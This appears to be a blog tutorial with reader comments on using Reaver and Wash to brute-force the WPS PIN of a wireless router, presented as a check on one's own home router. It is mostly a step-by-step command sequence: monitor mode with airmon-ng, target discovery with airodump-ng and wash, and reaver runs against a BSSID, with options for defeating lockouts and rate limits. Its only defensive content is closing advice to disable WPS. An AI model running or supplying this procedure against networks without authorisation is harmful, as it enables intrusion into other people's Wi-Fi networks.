Skip to content

WPS – How to install and use Reaver to detect the WPS on your home router


WPS was supposed to make security easier, alas it destroyed much of your security.  Install Reaver to see what I mean.

Step 1 – Download Reaver

sudo apt-get install aircrack-ng reaver


Step 2 – Put your wireless card into “monitor mode”

sudo airmon-ng

Check wireless cards are detected.  Are your cards detected?

sudo airmon-ng start wlan0


Step 3 – Find the Unique ID of your Router

airodump-ng mon0

Control + C – to stop airodump and be able to cut and paste the Basestation ID

Open a second root terminal


Step 4 – Use Wash to find WPS Routers

wash -i mon0

note if you get fcs errors (as shown)

fcs error

wash-i mon0 –ignore-fcs


Step 5 – Start Reaver running against your Routers’ ID

Cut and paste the Basestation MAC from your first terminal

reaver -i mon0 -b AA:BB:CC:65:FF:B4 -vv

This means:

reaver -i mon0 (monitoring interface)  You need to make wlan0 into mon0 to listen to all packets.

-b bssid (basestation Security ID) that you attacking.  The BSSID is the MAC of the router. The ESSID is the human name for the router eg “useless or wobbly”.

-vv (very verbose)

Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP.


Step 6 – Useful Reaver commands for running against your Routers’ ID

By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface’s channel:

reaver -i mon0 -b 00:01:02:03:04:05 –fixed


The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):

reaver -i mon0 -b 00:01:02:03:04:05 -t 2


The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:

reaver -i mon0 -b 00:01:02:03:04:05 -d 0


Some APs will temporarily lock their WPS state, typically for five minutes or less, when “suspicious” activity is detected

reaver -i mon0 -b 00:01:02:03:04:05 –lock-delay=250


For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each pin number as it is attempted:

reaver -i mon0 -b 00:01:02:03:04:05 -vv


When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:

reaver -i mon0 -b 00:01:02:03:04:05 –fail-wait=120


Additonal Info – Setting the exact Channel etc

“reaver -i mon0 -b (bssid) -vv -c (channel) -e (name of AP) -p (wps pin)


Step 7 – Background info on Wash

WPS is installed with using a push button on the router, or a PIN.  WASH targets the Pin based WPS systems not the push button system.

Wash will only show access points that support WPS. 
Wash displays the following information for each discovered access point:

		BSSID		The BSSID of the AP
		Channel		The APs channel, as specified in the AP's beacon packet
		WPS Version	The WPS version supported by the AP
		WPS Locked	The locked status of WPS, as reported in the AP's beacon packet
		ESSID		The ESSID of the AP
However, wash can be instructed to send probe requests to each AP in order to obtain more information about the AP:

wash -i mon0 --scan

	By sending probe requests, wash will illicit a probe response from each AP. For WPS-capable APs, the
	WPS information element typically contains additional information about the AP, including make, model,
	and version data. This data is stored in the survey table of the reaver.db database.

How long?

Between 2 and 10 hours later, Reaver will hand over the Routers WPS pin


Your router may “rate limit” after say 5 mins of attacks – mine does.
It may then rate limit your attacks, and only carry out 1 attack per minute.


You are advised to turn off WPS on your router.
Or buy a router that has “rate limiting” against WPS attacks.

How to fix airmon-ng errors in KALI 2.0


Which is the safest VPN on the market? Who do I use for a VPN?


Warrant Canary – can be found here:


Brute force hacking – But why do I have to disable the WPS pin on my home router?


WPS Flaw Vulnerable Devices – List of Router Models and whether vulnerable to WPS attacks


Select your router manufacturer, then model, the spreadsheet will tell you how many hours it will take to crack your router via WPS.

  1. N1ksana permalink


  2. Hi, I have one question, I have done access point mapping using airodump-ng, so i have collected so many aps, with different encryption some of are open aps. Is there any tools or web services are available for

    visualization ?
    I found this website but is there any other sources are available ?



  3. The “wash” command seems not working any more. Is there any other alternative


    • Hi Francesco,
      Wash has several issues when you first use it. The first is easily resolved by creating a new directory. I’ve pasted this comment in, as it might apply to your setup.
      Just thought i’d chime in in case someone stumbles across this post. The reason it isnt working is because a directory doesnt exist where wash is attempting to write the db file. The fix is simply a folder creation.

      mkdir /etc/reaver

      The wash forum reference links are:

      Let me know how you get on.


    But only if I run before:

    – ifconfig wlan0 down
    – iwconfig wlan0 mode monitor
    – ifconfig wlan0 up
    – airodump-ng wlan0

    The command:

    – airmon-ng start wlan0

    is not working any more. I was using “wash” and “reaver” with the commands you wrote above few years ago on Kali. Today I run Debian Jessie.
    Could be this the difference?


    • Hi Francesco,

      It looks like airmon have changed their syntax – I found this comment:

      OK, better explanation is mon0,mon1 etc. are no more.

      It has been replaced by wlan0mon,wlan1mon etc. It was replaced because this is (supposedly) a new and better method to put cards into monitor mode. “With the release of Aircrack-ng 1.2 RC2, aircrack-zc has officially replaced the original aircrack-ng, as the new standard.” I liked the old way just fine and so did my scripts..

      So that explains a lot!! Its fantastic news that you’ve got it working.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: